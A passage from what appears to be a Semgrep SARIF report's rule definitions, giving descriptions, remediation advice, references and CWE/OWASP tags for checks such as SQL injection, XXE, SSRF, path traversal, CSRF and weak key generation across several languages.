Rule](https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://github.com/gorilla/csrf](https://github.com/gorilla/csrf)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","id":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","name":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","id":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","name":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user data flowing into exec. This is code injection and should be avoided."},"help":{"markdown":"Detected user data flowing into exec. This is code injection and should be avoided.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection)\n - [https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html)\n","text":"Detected user data flowing into exec. This is code injection and should be avoided."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection","id":"python.flask.security.injection.user-exec.exec-injection","name":"python.flask.security.injection.user-exec.exec-injection","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.user-exec.exec-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request)\n - [https://godoc.org/github.com/levigross/grequests#DoRegularRequest](https://godoc.org/github.com/levigross/grequests#DoRegularRequest)\n - [https://github.com/levigross/grequests](https://github.com/levigross/grequests)\n","text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint","id":"rust.hyper.sql.sqlx-taint.sqlx-taint","name":"rust.hyper.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","id":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","name":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-pickleshare-django.tainted-pickleshare-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"help":{"markdown":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks](https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key)\n","text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","id":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","name":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"help":{"markdown":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js)\n - [https://golang.org/pkg/html/template/#JS](https://golang.org/pkg/html/template/#JS)\n","text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","id":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","name":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password","id":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","name":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-empty-password.gorm-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe)\n - [https://www.npmjs.com/package/xml2json](https://www.npmjs.com/package/xml2json)\n","text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","id":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","name":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-xml2json-xxe.express-xml2json-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"help":{"markdown":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string](https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string)\n","text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","id":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","name":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","id":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","name":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"help":{"markdown":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf","id":"javascript.express.security.audit.express-ssrf.express-ssrf","name":"javascript.express.security.audit.express-ssrf.express-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-ssrf.express-ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","id":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","name":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"setMultipleAllowances() is missing onlyOwner modifier"},"help":{"markdown":"setMultipleAllowances() is missing onlyOwner modifier\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control)\n - [https://twitter.com/danielvf/status/1494317265835147272](https://twitter.com/danielvf/status/1494317265835147272)\n - [https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8](https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8)\n - [https://play.secdim.com/game/dapp/challenge/rigoownsol](https://play.secdim.com/game/dapp/challenge/rigoownsol)\n","text":"setMultipleAllowances() is missing onlyOwner modifier"},"helpUri":"https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","id":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","name":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library."},"help":{"markdown":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib 